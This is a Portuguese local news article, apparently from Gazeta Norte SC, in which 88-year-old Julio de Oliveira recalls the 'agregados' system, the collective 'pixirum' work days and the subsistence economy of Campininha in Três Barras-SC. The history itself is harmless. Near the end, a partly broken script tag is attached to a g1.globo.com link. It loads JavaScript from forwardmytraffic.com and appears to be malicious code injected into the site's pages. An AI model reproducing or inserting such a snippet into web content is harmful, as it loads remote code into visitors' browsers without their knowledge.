InícioCuriosidades do PassadoNeto de João Pedro de Oliveira recorda sobre o sistema de agregados...

Neto de João Pedro de Oliveira recorda sobre o sistema de agregados e o pixirum na localidade da Campininha em Três Barras-SC

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

 

No passado, era comum os grandes proprietários de terras, terem agregados em suas propriedades. Na localidade da Campininha, em Três Barras-SC, podemos citar o caso do senhor João Pedro de Oliveira, cidadão tresbarrense, homenageado com o nome na E.B.M. “João Pedro de Oliveira”. Julio de Oliveira, conhecido como Seu Julico, aos 88 anos de idade, descreve como funcionava o sistema de agregados do avô.

Agregados:

Muito diferente do atual modelo capitalista de produção agrícola, os pequenos agricultores organizavam-se coletivamente. O chamado pixirum era usado no roçado, na plantação e na colheita.  A união de diferentes famílias, durante o árduo trabalho diário, terminava com um baile. Seu Julico participou de pixiruns e recorda como eles aconteciam.

Pixirum

A economia de subsistência, baseada na troca de alguns produtos, entre os pequenos agricultores, garantia o abastecimento alimentício dos lares.  As relações de solidariedade marcaram a memória daqueles que viveram na localidade da Campininha- Três Barras-SC.

Economia

Sistema de agregados, pixirum e economia de subsistência baseada na troca de alguns produtos, com pouca circulação do dinheiro, aos poucos vêm sendo substituídos pelo modelo capitalista de produção agrícola. As relações de solidariedade no trabalho, abriram espaço para a concorrência entre os agricultores do campo.

Para saber mais:

Entrevista completa disponível:   https://www.ecosdocontestado.com/memorias

 

Sobre a Tafona (citada no vídeo “economia”):

http://g1.globo.com/sc/santa-catarina/jornal-do-almoco/videos/v/conheca-a-pratica-da-tafona-tarefa-que-passa-por-geracoes-no-sul-do-estado/6058086/… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.